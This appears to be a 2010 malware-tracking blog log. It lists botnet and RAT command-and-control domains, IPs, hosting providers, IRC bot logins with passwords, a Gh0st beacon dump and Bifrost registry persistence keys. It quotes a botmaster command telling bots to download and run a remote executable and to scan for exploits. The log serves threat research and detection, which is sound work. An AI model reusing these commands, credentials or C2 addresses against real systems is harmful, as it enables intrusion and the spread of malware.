Month: November 2010

www.myrouji.com (malware hosted with Cnlink Networks Inc, Pasadena, United States)

– DNS Queries:
  Name             Query Type   Query Result    Successful   Protocol
  www.myrouji.com  DNS_TYPE_A   74.126.183.34   1
– Unknown TCP Traffic: 74.126.183.34:8883
  State: Connection established, not terminated
– Transferred outbound Bytes: 160
– Transferred inbound Bytes: 22
  Data sent:
    4768 3073 74a0 0000 00e0 0000 0078 9c4b   Gh0st……..x.K
    8bf6 669e c3c0 c0c0 0ac4 8c40 acc1 c5c0   ..f……..@….
    c004

update2.helohmar.com (Butterfly bot hosted with Didjief Internation Kulinari Koncept Llc, United Kingdom)

DNS Lookup
  Host Name           IP Address
  ms.allnewdots.com   208.53.131.135

ircd here
PASS laorosr
NCIK [N00_USA_XP_2598789].รง@
USER SP3-191 * 0 :EXPERIEN-9DF758
:hub.us.com 001 [N00_USA_XP_2598789]___ :us, [N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com :
:hub.us.com 005 [N00_USA_XP_2598789]___ :
[N00_USA_XP_2598789]___!SP3-191@host81-141-83-239.wlms-broadband.com JOIN :#dpi
:hub.us.com 332 [N00_USA_XP_2598789]___ #dpi :finito
:hub.us.com 333 [N00_USA_XP_2598789]___ #dpi la 1291139776
:hub.us.com 353 [N00_USA_XP_2598789]___ @ #dpi :[N00_USA_XP_2598789]___
:hub.us.com 366 [N00_USA_XP_2598789]___ #dpi :End of /NAMES

testusa.helohmar.com (malware hosted with Fdcservers.net, Woodstock, United States)

DNS Lookup
  Host Name              IP Address
  testusa.helohmar.com   76.73.36.42
  api.ipinfodb.com       67.212.74.82
  www.craigslist.org     208.82.236.208
  geo.craigslist.org     208.82.236.208

Download URLs
  http://67.212.74.82/v2/ip_query.php?key=4f7c7d0d524a3e9445217575619159f874a734aa16e97b87fc505f49de8e31a1&output=xml (api.ipinfodb.com)
  http://208.82.236.208/ (www.craigslist.org)
  http://208.82.236.208/ (www.craigslist.org)

Outgoing connection to remote server: testusa.helohmar.com port 8800
Outgoing connection to remote server: testusa.helohmar.com port 8800
Outgoing connection to remote server: testusa.helohmar.com TCP port 8800
Outgoing connection to remote server: api.ipinfodb.com TCP port

xvm-168-229.ghst.net (botnet hosted with Gandi Uk Dedicated Hosting Servers, United Kingdom)

Remote Host       Port Number
217.70.188.30     5900
  PASS Virus
92.243.28.194     5900
  PASS Virus
95.142.168.229    5900
  PASS Virus

NICK VirUs-xlaixqgo
USER VirUs “” “zbo” : 8Coded 8Ahmed.Ramzey@Hotmail.Com..
NICK VirUs-firqfllm
USER VirUs “” “zux” :
NICK VirUs-nqcgfvif
USER VirUs “” “pcm” :
NICK VirUs-whzmmafw
USER VirUs “” “kga” :
NICK VirUs-rffujwic
USER VirUs “” “xvi” :
NICK VirUs-ubjkqifu

mydrivers.babypin.net (botnet hosted with Vpls Inc. d/b/a Krypt Technologies, Orange, United States)

mydrivers.babypin.net ip: 109.196.130.50
mydrivers.babypin.net ip: 109.196.130.66
mydrivers.babypin.net ip: 98.126.214.82

Remote Host       Port Number
112.78.112.208    80
218.85.133.201    80
98.126.214.82     6682

PASS laorosr
USER SP2-364 * 0 :COMPUTERNAME
MODE [N00_USA_XP_6656961] @ -ix
MODE #dpi -ix
Master86 changes topic to ‘.asc -S|.http http://208.53.183.181/icsy.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all

www.52fa.net (malware hosted with Sharktech Internet Services, Missoula, United States)

DNS Lookup
  Host Name      IP Address
  0              127.0.0.1
  www.52fa.net   www.52fa.net
  www.52fa.net   204.188.243.34

UDP Connections
  Remote IP Address: 127.0.0.1  Port: 1033
  Send Datagram: 2 packet(s) of size 1
  Recv Datagram: 2 packet(s) of size 1

Download URLs
  http://204.188.243.34/wm1/count.asp?mac=00:0C:F1:85:8C:74&ver=1&os=nothing (www.52fa.net)

Outgoing connection to remote server: www.52fa.net TCP port 80

Registry Changes by all processes
  Create or Open
  Changes

april2.botsgod.info (VirUs, the biggest lamer, with a big botnet hosted with Gandi Uk Dedicated Hosting Servers, United Kingdom)

april2.botsgod.info ip: 92.243.28.194
april2.botsgod.info ip: 95.142.168.229
april2.botsgod.info ip: 217.70.188.30

Remote Host       Port Number
217.70.188.30     4949
92.243.28.194     4949
95.142.168.229    4949

NICK {NOVY}[USA][XP-SP2]043406
USER VirUs “” “lol” :0320
NICK [USA][XP-SP2]073489
USER VirUs “” “lol” :7113
USER VirUs “” “lol” :4947
NICK [USA][XP-SP2]725879
USER VirUs “” “lol” :8170
NICK [USA][XP-SP2]710812
USER VirUs “” “lol” :0319
NICK [USA][XP-SP2]250195
USER

medogrgr.no-ip.biz (Bifrose hacker from Riyadh, Saudi Arabia)

DNS Lookup
  Host Name            IP Address
  medogrgr.no-ip.biz   188.49.5.146

Outgoing connection to remote server: medogrgr.no-ip.biz TCP port 81

Registry Changes by all processes
  Create or Open
  Changes
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{9D71D88C-C598-4935-C5D1-43AA4DB90836} “stubpath” = [REG_EXPAND_SZ, value: C:\WINDOWS\Bifrost\server.exe s]
    HKEY_LOCAL_MACHINE\SOFTWARE\Bifrost “nck” = [REG_BINARY, size: 16 bytes]
    HKEY_CURRENT_USER\Software\Bifrost “klg” = [REG_BINARY, size: 1 bytes]
  Reads
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Advanced INF Setup “AdvpackLogFile”
    HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal